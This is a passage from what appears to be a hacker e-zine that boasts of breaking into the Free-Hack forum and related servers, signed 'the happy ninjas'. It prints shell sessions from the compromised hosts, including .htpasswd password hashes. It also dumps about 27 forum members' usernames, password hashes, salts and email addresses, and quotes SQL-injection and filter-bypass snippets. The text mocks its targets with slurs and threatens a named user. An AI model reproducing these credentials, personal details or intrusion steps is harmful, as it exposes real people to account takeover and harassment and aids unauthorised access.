('',\"$ip\",\"$version\")"; mysql_query($query); mysql_close(); header( "Location: $link "); exit; } elseif ($version=="bt3") { $iso="bt3-final.iso"; $link=choose($iso); mysql_connect("localhost",$username,$password); @mysql_select_db($database) or die( "Unable to select database"); $query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")"; mysql_query($query); mysql_close(); header( "Location: $link "); exit; } else { exit; } ?> $ cat s.php $ cd wiki $ ls total 700 drwxr-xr-x. 15 apache apache 4096 Nov 27 16:52 . drwxr-xr-x. 13 apache apache 4096 Dec 9 12:21 .. -rw-r--r--. 1 apache apache 23 Nov 14 16:01 .htpasswd -rw-r--r--. 1 apache apache 17997 Apr 5 2006 COPYING -rw-r--r--. 1 apache apache 2073 Jul 27 07:29 CREDITS -rw-r--r--. 1 apache apache 76 Jul 27 2009 FAQ -rw-r--r--. 1 apache apache 392287 Mar 12 2010 HISTORY -rw-r--r--. 1 apache apache 96 Nov 14 16:01 HT -rw-r--r--. 1 apache apache 4138 Apr 18 2008 INSTALL -rw-r--r--. 1 apache apache 5469 Nov 28 16:45 LocalSettings.php -rw-r--r--. 1 apache apache 3649 Nov 11 2008 README -rw-r--r--. 1 apache apache 58431 Jul 28 03:11 RELEASE-NOTES -rw-r--r--. 1 apache apache 648 May 7 2009 StartProfiler.sample -rw-r--r--. 1 apache apache 13307 Mar 25 2010 UPGRADE drwxr-xr-x. 2 root root 4096 Nov 27 16:53 adsense -rw-r--r--. 1 apache apache 4707 Feb 15 2010 api.php -rw-r--r--. 1 apache apache 25 Feb 3 2008 api.php5 drwxr-xr-x. 2 apache apache 4096 Jul 28 03:16 bin -rw-r--r--. 1 apache apache 8436 Nov 21 14:24 bt-wiki.png drwxr-xr-x. 2 apache apache 4096 Jul 28 03:16 cache drwxr-xr-x. 2 apache apache 4096 Nov 14 15:58 config drwxr-xr-x. 4 apache apache 4096 Jul 28 03:16 docs drwxr-xr-x. 4 apache apache 4096 Nov 28 16:44 extensions drwxr-xr-x. 12 apache apache 4096 Nov 23 12:36 images -rw-r--r--. 1 apache apache 4031 Oct 14 2009 img_auth.php -rw-r--r--. 1 apache apache 31 Feb 3 2008 img_auth.php5 drwxr-xr-x. 16 apache apache 4096 Jul 28 03:16 includes -rw-r--r--. 1 apache apache 4329 Jan 1 2010 index.php -rw-r--r--. 1 apache apache 28 Feb 3 2008 index.php5 drwxr-xr-x. 4 apache apache 4096 Jul 28 03:16 languages drwxr-xr-x. 13 apache apache 12288 Nov 22 12:55 maintenance drwxr-xr-x. 2 apache apache 4096 Jul 28 03:16 math -rw-r--r--. 1 apache apache 3054 Mar 21 2009 opensearch_desc.php -rw-r--r--. 1 apache apache 39 Mar 3 2008 opensearch_desc.php5 -rw-r--r--. 1 apache apache 174 Feb 3 2010 php5.php5 -rw-r--r--. 1 apache apache 8821 Jul 27 03:40 profileinfo.php -rw-r--r--. 1 apache apache 383 Mar 21 2009 redirect.php -rw-r--r--. 1 apache apache 31 Feb 3 2008 redirect.php5 -rw-r--r--. 1 apache apache 89 Feb 3 2010 redirect.phtml drwxr-xr-x. 2 apache apache 4096 Jul 28 03:16 serialized -rwxrwxrwx. 1 root root 6816 Nov 23 18:29 sitemap.xml drwxr-xr-x. 9 apache apache 4096 Nov 28 14:12 skins -rw-r--r--. 1 apache apache 4905 Mar 8 2010 thumb.php -rw-r--r--. 1 apache apache 29 Feb 3 2008 thumb.php5 -rw-r--r--. 1 apache apache 1347 Nov 5 2008 trackback.php -rw-r--r--. 1 apache apache 32 Mar 16 2009 trackback.php5 -rw-r--r--. 1 apache apache 86 Feb 3 2010 wiki.phtml $ cat .htpasswd edbadmin:YE8mle4nG1Z.c cd .. cat forums/includes/config.php /proc/vz/vzaquota/00000045/aquota.group lrwxrwxrwx 1 root root 38 Nov 30 02:12 aquota.user -> /proc/vz/vzaquota/00000045/aquota.user drwx--x--x 3 root root 4096 Nov 13 09:00 backup drwxr-xr-x 2 root root 4096 Nov 17 00:24 bin drwxr-xr-x 2 root root 4096 Jan 26 2010 boot drwxr-xr-x 7 root root 1900 Nov 30 02:12 dev drwxr-xr-x 68 root root 12288 Dec 8 21:35 etc drwx--x--x 8 root root 4096 Nov 14 07:11 home drwxr-xr-x 9 root root 4096 Nov 12 08:24 lib drwxr-xr-x 7 root root 4096 Nov 12 08:24 lib64 drwxr-xr-x 2 root root 4096 Jan 26 2010 media drwxr-xr-x 2 root root 4096 Jan 26 2010 mnt drwxr-xr-x 10 root root 4096 Nov 12 16:31 opt dr-xr-xr-x 113 root root 0 Nov 30 02:12 proc drwxr-x--- 14 root root 4096 Dec 8 21:36 root drwxr-xr-x 2 root root 4096 Nov 17 00:24 sbin drwxr-xr-x 5 root root 20480 Dec 8 00:24 scripts drwxr-xr-x 2 root root 4096 Jan 26 2010 selinux drwxr-xr-x 2 root root 4096 Jan 26 2010 srv drwxr-xr-x 3 root root 0 Nov 30 02:12 sys drwxrwxrwt 10 root root 4096 Dec 8 21:36 tmp drwxr-xr-x 16 root root 4096 Nov 11 18:17 usr drwxr-xr-x 22 root root 4096 Nov 11 18:01 var $ ls -la /home/freehack/public_html total 3100 drwxr-x--- 34 freehack nobody 4096 Dec 4 22:13 . drwx--x--x 14 freehack freehack 4096 Dec 7 11:15 .. -rw-r--r-- 1 freehack freehack 1086 Dec 4 22:27 .htaccess drwxr-xr-x 11 freehack freehack 4096 Nov 14 09:24 2tgh9322132k322l1sd -rw-r--r-- 1 freehack freehack 6726 Jan 18 2010 LICENSE drwxr-xr-x 2 freehack freehack 4096 Nov 14 07:11 _private drwxr-xr-x 4 freehack freehack 4096 Nov 14 08:28 _vti_bin drwxr-xr-x 2 freehack freehack 4096 Nov 14 07:11 _vti_cnf drwxr-xr-x 2 freehack freehack 4096 Nov 14 07:11 _vti_log drwxr-x--- 2 freehack nobody 4096 Nov 14 07:11 _vti_pvt drwxr-xr-x 2 freehack freehack 4096 Nov 14 07:11 _vti_txt -rw-r--r-- 1 freehack freehack 19341 Jan 18 2010 accessmask.php -rw-r--r-- 1 freehack freehack 12687 Jan 18 2010 admin_rbs.php -rw-r--r-- 1 freehack freehack 2645 Jan 18 2010 admin_rbs_banner_list.php -rw-r--r-- 1 freehack freehack 3089 Jan 18 2010 admin_rbs_convert.php -rw-r--r-- 1 freehack freehack 2667 Jan 18 2010 admin_rbs_d_banner_list.php -rw-r--r-- 1 freehack freehack 2668 Jan 18 2010 admin_rbs_h_banner_list.php -rw-r--r-- 1 freehack freehack 2668 Jan 18 2010 admin_rbs_v_banner_list.php -rw-r--r-- 1 freehack freehack 2681 Jan 18 2010 admin_rbs_x_banner_list.php -rw-r--r-- 1 freehack freehack 39582 Jan 18 2010 admincalendar.php -rw-r--r-- 1 freehack freehack 49644 Jan 18 2010 admininfraction.php -rw-r--r-- 1 freehack freehack 19150 Jan 18 2010 adminlog.php -rw-r--r-- 1 freehack freehack 8149 Jan 18 2010 adminpermissions.php -rw-r--r-- 1 freehack freehack 25516 Jan 18 2010 adminreputation.php -rw-r--r-- 1 freehack freehack 1230 Jan 18 2010 ads.php -rw-r--r-- 1 freehack freehack 23844 Jan 18 2010 ajax.php -rw-r--r-- 1 freehack freehack 75511 Jan 18 2010 album.php drwxrwxrwx 2 freehack freehack 4096 Nov 14 08:04 amecache -rw-r--r-- 1 freehack freehack 17137 Jan 18 2010 announcement.php drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:04 archive -rw-r--r-- 1 freehack freehack 18309 Jan 18 2010 attachment.php -rw-r--r-- 1 freehack freehack 12512 Jan 18 2010 attachmentpermission.php -rw-r--r-- 1 freehack freehack 80983 Jan 18 2010 automediaembed_admin.php -rw-r--r-- 1 freehack freehack 1979 Jan 18 2010 autorefresh_footer.php -rw-r--r-- 1 freehack freehack 1979 Jan 18 2010 autorefresh_header.php -rw-r--r-- 1 freehack freehack 1991 Jan 18 2010 autorefresh_navbar.php -rw-r--r-- 1 freehack freehack 1430 Jan 18 2010 autotagger_ajax.php -rw-r--r-- 1 freehack freehack 19355 Jan 18 2010 avatar.php -rw-r--r-- 1 freehack freehack 46771 Jan 18 2010 banner.png -rw-r--r-- 1 freehack freehack 16461 Jan 18 2010 bbcode.php drwxr-xr-x 6 freehack freehack 4096 Nov 14 08:06 bilder drwxr-xr-x 8 freehack freehack 4096 Nov 25 14:18 blog -rw-r--r-- 1 freehack freehack 14782 Jan 18 2010 bookmarksite.php -rw-r--r-- 1 freehack freehack 75327 Jan 18 2010 calendar.php -rw-r--r-- 1 freehack freehack 12083 Jan 18 2010 calendarpermission.php drwxr-xr-x 2 freehack freehack 4096 Nov 14 07:11 cgi-bin -rw-r--r-- 1 freehack freehack 43 Jan 18 2010 clear.gif drwxr-xr-x 4 freehack freehack 4096 Nov 14 08:08 clientscript drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:08 control_examples -rw-r--r-- 1 freehack freehack 14938 Jan 18 2010 converse.php drwxr-xr-x 3 freehack freehack 4096 Nov 18 14:14 cpa drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:11 cpm drwxr-xr-x 7 freehack freehack 4096 Nov 14 08:12 cpstyles -rw-r--r-- 1 freehack freehack 3317 Jan 18 2010 cron.php -rw-r--r-- 1 freehack freehack 24049 Jan 18 2010 cronadmin.php -rw-r--r-- 1 freehack freehack 10734 Jan 18 2010 cronlog.php -rw-r--r-- 1 freehack freehack 34087 Jan 18 2010 css.php drwxrwxrwx 3 freehack freehack 4096 Nov 14 08:13 customavatars drwxrwxrwx 3 freehack freehack 4096 Nov 14 08:13 customgroupicons drwxrwxrwx 2 freehack freehack 4096 Nov 14 08:13 customprofilepics -rw-r--r-- 1 freehack freehack 21833 Jan 18 2010 diagnostic.php -rw-r--r-- 1 freehack freehack 47757 Jan 18 2010 editpost.php -rw-r--r-- 1 freehack freehack 11748 Jan 18 2010 email.php -rw-r--r-- 1 freehack freehack 29500 Jan 18 2010 external.php -rw-r--r-- 1 freehack freehack 9786 Jan 18 2010 faq.php -rw-r--r-- 1 freehack freehack 22486 Jan 18 2010 favicon.ico -rw-r--r-- 1 freehack freehack 30137 Jan 18 2010 forum.php -rw-r--r-- 1 freehack freehack 35658 Jan 18 2010 forumdisplay.php -rw-r--r-- 1 freehack freehack 30063 Jan 18 2010 forumpermission.php -rw-r--r-- 1 freehack freehack 15499 Oct 11 10:03 gla_test.php -rw-r--r-- 1 freehack freehack 39830 Jan 18 2010 global.php -rw-r--r-- 1 freehack freehack 53 Oct 24 14:48 googlef4001cc5b1db090b.html -rw-r--r-- 1 freehack freehack 137885 Jan 18 2010 group.php -rw-r--r-- 1 freehack freehack 24919 Jan 18 2010 group_inlinemod.php -rw-r--r-- 1 freehack freehack 10524 Jan 18 2010 groupsubscription.php -rw-r--r-- 1 freehack freehack 25922 Jan 18 2010 help.php drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:13 htaccess -rw-r--r-- 1 freehack freehack 9047 Jan 18 2010 image.php drwxr-xr-x 20 freehack freehack 4096 Nov 14 08:51 images drwxr-xr-x 5 freehack freehack 4096 Nov 14 08:52 img drwxr-xr-x 7 freehack freehack 12288 Dec 4 22:09 includes -rw-r--r-- 1 freehack freehack 19592 Jan 18 2010 index.php -rw-r--r-- 1 freehack freehack 43829 Jan 18 2010 infraction.php -rw-r--r-- 1 freehack freehack 182759 Jan 18 2010 inlinemod.php -rw-r--r-- 1 freehack freehack 10342 Jan 18 2010 joinrequests.php -rw-r--r-- 1 freehack freehack 10222 Jan 18 2010 login.php drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:59 madp -rw-r--r-- 1 freehack freehack 17066 Jan 18 2010 member.php -rw-r--r-- 1 freehack freehack 15931 Jan 18 2010 member_inlinemod.php -rw-r--r-- 1 freehack freehack 35901 Jan 18 2010 memberlist.php -rw-r--r-- 1 freehack freehack 23867 Jan 18 2010 misc.php -rw-r--r-- 1 freehack freehack 63331 Jan 18 2010 moderation.php -rw-r--r-- 1 freehack freehack 6756 Jan 18 2010 moderator.php -rw-r--r-- 1 freehack freehack 18477 Jan 18 2010 newattachment.php -rw-r--r-- 1 freehack freehack 37104 Jan 18 2010 newreply.php -rw-r--r-- 1 freehack freehack 18911 Jan 18 2010 newthread.php -rw-r--r-- 1 freehack freehack 5725 Jan 18 2010 nex_stats_tend_classes.php drwxr-xr-x 9 freehack freehack 4096 Nov 25 18:38 nopaste -rw-r--r-- 1 freehack freehack 12095 Jul 20 15:01 oks.png -rw-r--r-- 1 freehack freehack 19604 Jan 18 2010 online.php -rw-r--r-- 1 freehack freehack 7696 Jan 18 2010 payment_gateway.php -rw-r--r-- 1 freehack freehack 11910 Jan 18 2010 payments.php -rw-r--r-- 1 freehack freehack 7889 Jan 18 2010 picture.php -rw-r--r-- 1 freehack freehack 22040 Jan 18 2010 picture_inlinemod.php -rw-r--r-- 1 freehack freehack 25311 Jan 18 2010 picturecomment.php -rw-r--r-- 1 freehack freehack 27415 Jan 18 2010 poll.php -rw-r--r-- 1 freehack freehack 17744 Jan 18 2010 post_thanks.php -rw-r--r-- 1 freehack freehack 9512 Jan 18 2010 posthistory.php -rw-r--r-- 1 freehack freehack 74369 Jan 18 2010 postings.php -rw-r--r-- 1 freehack freehack 4763 Jan 18 2010 pprm.php -rw-r--r-- 1 freehack freehack 6594 Jan 18 2010 printthread.php -rw-r--r-- 1 freehack freehack 70748 Jan 18 2010 private.php -rw-r--r-- 1 freehack freehack 152336 Jan 18 2010 profile.php -rw-r--r-- 1 freehack freehack 2712 Feb 3 2010 rbs_banner.php -rw-r--r-- 1 freehack freehack 39751 Jan 18 2010 register.php -rw-r--r-- 1 freehack freehack 5688 Jan 18 2010 report.php -rw-r--r-- 1 freehack freehack 13720 Jan 18 2010 reputation.php -rw-r--r-- 1 freehack freehack 124717 Jan 18 2010 search.php -rw-r--r-- 1 freehack freehack 20694 Jan 18 2010 sendmessage.php -rw-r--r-- 1 freehack freehack 10009 Jan 18 2010 showgroups.php -rw-r--r-- 1 freehack freehack 11374 Jan 18 2010 showpost.php -rw-r--r-- 1 freehack freehack 73470 Jan 18 2010 showthread.php drwxrwxrwx 2 freehack freehack 4096 Nov 14 08:59 signaturepics drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:59 sitemap -rw-r--r-- 1 freehack freehack 32848 Jan 18 2010 subscription.php -rw-r--r-- 1 freehack freehack 51471 Sep 11 14:10 support.php -rw-r--r-- 1 freehack freehack 13365 Jan 18 2010 tags.php -rw-r--r-- 1 freehack freehack 8692 Jan 18 2010 threadrate.php -rw-r--r-- 1 freehack freehack 12415 Jan 18 2010 threadtag.php drwxrwxrwx 2 freehack freehack 4096 Dec 8 03:30 tmp -rw-r--r-- 1 freehack freehack 34512 Jan 18 2010 usercp.php -rw-r--r-- 1 freehack freehack 19098 Jan 18 2010 usernote.php drwxrwxrwx 7 freehack freehack 4096 Nov 14 09:06 vboptimise drwxr-xr-x 4 freehack freehack 4096 Dec 4 22:11 vbseo -rw-r--r-- 1 freehack freehack 45172 Sep 14 01:00 vbseo.php drwxr-xr-x 4 freehack freehack 4096 Nov 14 09:14 vbseo_sitemap -rw-r--r-- 1 freehack freehack 4221 Sep 14 01:00 vbseocp.php -rw-r--r-- 1 freehack freehack 27357 Jan 18 2010 visitormessage.php -rw-r--r-- 1 freehack freehack 8431 Jan 18 2010 whoquotedme.php -rw-r--r-- 1 freehack freehack 334 Oct 7 11:32 x.php RETARDED PHP CODE ALERT! $ cat x.php $ cd 2tgh9322132k322l1sd $ ls total 252 drwxr-xr-x 11 508 504 4096 Nov 14 09:24 . drwxr-x--- 34 508 99 4096 Dec 4 22:13 .. -rw-r--r-- 1 508 504 129 Nov 14 09:24 .htaccess -rw-r--r-- 1 508 504 42 Nov 14 09:24 .htpasswd drwxr-xr-x 2 508 504 4096 Nov 14 07:22 ReadMe -rw-r--r-- 1 508 504 3661 Nov 14 09:20 config.php -rw-r--r-- 1 508 504 58442 Sep 22 2009 config_overview.php drwxr-xr-x 4 508 504 4096 Nov 14 07:16 css -rw-r--r-- 1 508 504 19372 Sep 22 2009 dump.php -rw-r--r-- 1 508 504 512 Nov 14 09:20 error_log -rw-r--r-- 1 508 504 22059 Sep 22 2009 filemanagement.php -rw-r--r-- 1 508 504 640 Sep 22 2009 help.php drwxr-xr-x 2 508 504 4096 Nov 14 07:17 images drwxr-xr-x 4 508 504 4096 Nov 14 07:18 inc -rw-r--r-- 1 508 504 871 Sep 22 2009 index.php -rw-r--r-- 1 508 504 24781 Sep 22 2009 install.php drwxr-xr-x 4 508 504 4096 Nov 14 07:18 js drwxr-xr-x 17 508 504 4096 Nov 14 07:22 language -rw-r--r-- 1 508 504 5461 Sep 22 2009 log.php -rw-r--r-- 1 508 504 1256 Sep 22 2009 main.php -rw-r--r-- 1 508 504 3930 Sep 22 2009 menu.php drwxr-xr-x 2 508 504 4096 Nov 14 07:22 msd_cron -rw-r--r-- 1 508 504 776 Sep 22 2009 refresh_dblist.php -rw-r--r-- 1 508 504 15762 Sep 22 2009 restore.php -rw-r--r-- 1 508 504 10187 Sep 22 2009 sql.php drwxr-xr-x 5 508 504 4096 Nov 14 07:22 tpl drwxrwxrwx 5 508 504 4096 Nov 14 09:20 work $ cat .htpasswd Suicide:$1$GTs9Hns/$lPMGV.EaLgyqwNxgTQSwf1 $ cat config.php 1000 $config['processlist_refresh']=3000; $config['empty_db_before_restore']=0; $config['optimize_tables_beforedump']=1; $config['stop_with_error']=1; // For sending a mail after backup set send_mail to 1, otherless set to 0 $config['send_mail']=0; // Attach the backup 0=no 1=yes $config['send_mail_dump']=0; // set the recieve adress for the mail $config['email_recipient']=''; $config['email_recipient_cc']=''; // set the sender adress (the script) $config['email_sender']=''; //max. Size of Email-Attach, here 3 MB $config['email_maxsize1']=3; $config['email_maxsize2']=2; // FTP Server Configuration for Transfer $config['ftp_transfer'][0]=0; $config['ftp_timeout'][0]=30; $config['ftp_useSSL'][0]=0; $config['ftp_mode'][0]=0; $config['ftp_server'][0]=''; // Adress of FTP-Server $config['ftp_port'][0]='21'; // Port $config['ftp_user'][0]=''; // Username $config['ftp_pass'][0]=''; // Password $config['ftp_dir'][0]=''; // Upload-Directory $config['ftp_transfer'][1]=0; $config['ftp_timeout'][1]=30; $config['ftp_useSSL'][1]=0; $config['ftp_mode'][1]=0; $config['ftp_server'][1]=''; $config['ftp_port'][1]='21'; $config['ftp_user'][1]=''; $config['ftp_pass'][1]=''; $config['ftp_dir'][1]=''; $config['ftp_transfer'][2]=0; $config['ftp_timeout'][2]=30; $config['ftp_useSSL'][2]=0; $config['ftp_mode'][2]=0; $config['ftp_server'][2]=''; $config['ftp_port'][2]='21'; $config['ftp_user'][2]=''; $config['ftp_pass'][2]=''; $config['ftp_dir'][2]=''; //Multipart 0=off 1=on $config['multi_part']=0; $config['multipartgroesse1']=1; $config['multipartgroesse2']=2; $config['multipart_groesse']=0; //Auto-Delete 0=off 1=on $config['auto_delete']=0; $config['max_backup_files']=3; //configuration file $config['cron_configurationfile']='mysqldumper.conf.php'; //path to perl, for windows use e.g. C:perlbinperl.exe $config['cron_perlpath']='/usr/bin/perl'; //mailer use sendmail(1) or SMTP(0) $config['cron_use_sendmail']=1; //path to sendmail $sendmail_path=ini_get('sendmail_path'); $config['cron_sendmail']=$sendmail_path>'' ? $sendmail_path: '/usr/lib/sendmail -t -oi -oem'; //adress of smtp-server $config['cron_smtp']='localhost'; //smtp-port $config['cron_smtp_port']=25; $config['cron_extender']=0; $config['cron_compression']=1; $config['cron_printout']=1; $config['cron_completelog']=1; $config['cron_comment']=''; $config['multi_dump']=0; $config['logcompression']=1; $config['log_maxsize1']=1; $config['log_maxsize2']=2; $config['log_maxsize']=1048576; ________________________ | |_____ __ | FREE-HACK LIST OF LAME | |__| |_________ |________________________| |::| | / /\**/\ | \.____|::|__| < ( o_o )_ | \::/ \._______\ (u--u \_) | (||___ )==\ ,dP"/b/=( /P"/b\ |8 || 8\=== || 8 `b, ,P `b, ,P """` """` AlterHacker:edcb38409dd601b93c6af3219d112557:9R#:BlackMaster@gmx.de fred777:50a1eab4c63175c910df92d870136e43:^"@:nebelfrost77@googlemail.com N1GH7FIR3:20ddb5d76b23f7e77cf82c9da0f685ee:QpY:daemonhunter.mail@gmail.com 100:f97becbc6292ac264119ca57881f643c:a<":ttorben@mailde.de Dexx:f59393b26641a10966b1400b17f20a93:e>>:dexx@free-hack.com noctem:23b5d90e4e8047f014ed439b092da804:l4i:noctem-fh@web.de Vitamin X:249bd491e1a2a4241babd149c021775b:-;3:vitaminxfh@mail.ru sn0w:3c5bc3d3863c3d06246e9dbb3563a46c:YHI:iop.123@arcor.de Apex:2d6725508c6f575996e99add1df75b78:#fj:micki5004@hotmail.com Toastbrot:92c5d47cb95b30c60a007af44c8e433a:GG::r4z3r2@gmx.de inyourface:d78cd66e4cb181741dbedb122a6abb4a:LD6:xyzdf8461@gmx.de H4x0r007:b7db51f35436e5ae0d398c8617b148f6:"zD:h4x0r2@web.de meckl:c23f739948b0a1a5b3ad225bdf355641:bNL:meckl@privatdemail.net J0hn.X3r:5311479819ac7652223469f9eb6afbf9:7\D:J0hn.X3r@gmail.com #b:07ff2d241ac7b8bfda85295ad74532db:@ce:bizzit@live.de enco:d02abd58ba8ddaa4e009970ba2aa4531:iV(:enne@bk.ru Lidloses_Auge:df8b7b3b4a3879b62b4fa36794907425:}5*:lidlosesauge@gmail.com Rip:0b8ccc848ca2de26becdb26635112e5f:.5%:libary.source@googlemail.com PoLe:8b1a2783236cba650ab671ef1e3b5d69:U!w:klogger@gmx.de GrafZeppelin:96d74a9a16342e578feabb787f9c4b65:}$/:gray_foxde@yahoo.de GODFATHER:6e2494acbfdf1a2c8f9bc4bc58c83ba1:AGe:Mighty.Mo89@Gmail.com Qgel:c1f57278216436f781d102fa254a077b:'yV:kug3lblitz@gmail.com DvdRom:a51a070617594bd6321bfde8ba5f5de4:=q$:dvd_rom123@hotmail.com Suicide:c4944d15980260f4e446b679e1769395:]fL:followtheleader@bk.ru novaca!ne:8ee3a88448d320961ff82e8f350e21cd:BuY:novacaine@privatdemail.net ea$y:1a8ef8a801b84e16a5a344babe49287e:V-7:localserver@gaza.net krypt0n:855801493f43e3c7b3471e50c2ee2e7e:fZr:hellyeahima@atheist.com We think that novaca!ne's magic_quotes bypass is quite representative for this group: --snip snip-- Bypass magic_quotes (novaca!ne) magic_quotes is a php setting (php.ini). It causes that every ' (single-quote), " (double quote) and \ (backslash) are escaped with a backslash automatically, a weak but wellknown securing method. This is how to bypass it: Use the funktion called „String.fromCharCode()“, you need to translate your MySQL command into ascII (http://www.asciizeichen.de/tabelle.html) and put it input into the handling. ‘ OR ‘a’ = ‘a equals String.fromCharCode(8216, 32, 79, 82, 32, 8216, 97, 8217, 32, 61, 32, 8216, 97) --snip snip-- novaca!ne is (next to fred777) of course, our new security superhero! Congratz, faggot... Finally we shouldn't forget our old fag superhero fred777, who helped us to understand how we could get every source code of a page. This sounds pretty hard, but fred777 shows his priv8 techniques (we fear them): --snip snip-- ######################################################### # Sourcecode disclosure by social engineering # tested on NPD ######################################################### Intro: Ich schildere hier mal einen Fall, welchen ich letztens noch vor mir hatte. Ich war durch Zufall mal wieder auf den vielen NPD Seiten, um nach Lücken zu suchen. Bei einer Subpage wurde ich dann auch fündig, zumindest erweckte es den Anschein, als ob sich da eine SQL Injection befände. Sobald nämlich der Limitparameter falsch übergeben wurde, kam der übliche SQL Error: --------------------------------------------------------- Rein logisch sah der Query so aus: SELECT `cats` FROM fred (sonstiges) LIMIT $_GET['la'],10; Als ich dann mittels eines Scripts versuchte den Query mit UNION zu erweitern, wollte es aber nicht funktionieren. Klar dafür konnte es so einige Gründe geben, allerdings hätte ich mir zu gerne den Source + Abfragen angeschaut. --------------------------------------------------------- Wieso eigentlich nicht? Nach einigen Ãœberlegungen, schrieb ich dann eine Mail an den Webmaster der Seite, mit dem Ziel, dass er mir den Source schickt. --snip snip-- What we learned is: - If we write an email to an admin we always get the source code - fred777 uses tools to exploit some sql injection "o_O", one of the banned users puts it nicely: "being lame is one of fred777's master skills" Just to inform you: We owned Free-Hack with this technique of course. TIME FOR SOME ______________________________________________________________________ IlapslapslapslapslapslapslapslapslapslapslapslapslapslapslapslapslapsI Isl_______l__slapslapslapsla_______a__lap__apslapslapslaps__pslap__apI Ip| __| |.---.-.-----.| _ | |_| |_.---.-.----.| |--.| |aI Ia|__ | || _ | _ || | _| _| _ | __|| < |__|lI Il|_______|__||___._| __||___|___|____|____|___._|____||__|__||__|sI Islapslapslapslapsla|__|pslapslapslapslapslapslapslapslapslapslapslapI IpslapslapslapslapslapslapslapslapslapslapslapslapslapslapslapslapslaI Right, who deserves it? Correct! Suicide and enco for being badass super high skilled computer professionals ... NOT This is a warning Free-Hack. Continue existing and we will show no mercy. Especially you, J0hn.X3r. Take your chance, go and grow up. ,_._._._._._._._|____________________________________________________ |_|_|_|_|_|_|_|_|___________________________________________________/ ~ last words ~ ! That's all for now. We hope that those we have owned understood the warning and that those who already enjoyed issue one were satisfied with this release. We will take a little break for now and go to Hawaii to get our asses drunk. But do not fear. There will always be enough time for us to audit more code, write more 0day and own more idiots. We will always watch the scene and act if we are needed. There is sill a lot to do and the winter of hax is not over yet. So do expect us. |\ /()/ \| - the happy ninjas ____________________________________________________|_._._._._._._._, \___________________________________________________|_|_|_|_|_|_|_|_| ! ~ OUTRO ~ , . | / \ I / \ .g88R_ d888(` ). _ - --==, 888( ),=-- .+(` )`. ) Y8P( '`, :( . ) .+(`( , ) .-- `. ( ) ) (( (..__,:'-' .=( ) ` _` ) ) `. `( ) ) ( , ) ( ) ._ ) ` __.:' ) ( ( )) `-',:ccee88oo, ) ) ( ) --' `- __,' ccC8O8O8Q8PoOb.o8oo .-' (_,' ,') pqdOB69QOFFE4OpugoO9bD .(_ ) CgggbbU8OU qOp qOdoUOdcb, . , .3X4X5U2M/p u gcoUodpP .\\\// /douUP And shepherds we shall be, for thee my Lord for \\\////. (´`) thee, power hath descended forth from thy hand, |||||. ,.(´ -.),. that our feet may swiftly carry out thy command. |||/\, ( , ,) We shall flow a river forth to thee, and teeming |||\/. `-´`´`´. with souls shall it ever be. In nomine patris, |||||. et filii, et spiritus sancti ,..,,.,.,....,,,,//||||\...,,,, ,...,...,..,...,,..,,.,.,..,,.,,,.,,,,,,,..,.,,,,...,.,.,...,,..,. .,.,,,,..,..,.,..,,,,.,..,.,,.,..,..,,,,.,...,,..,,,..,..,....,..,..,. © Offensive Security 2010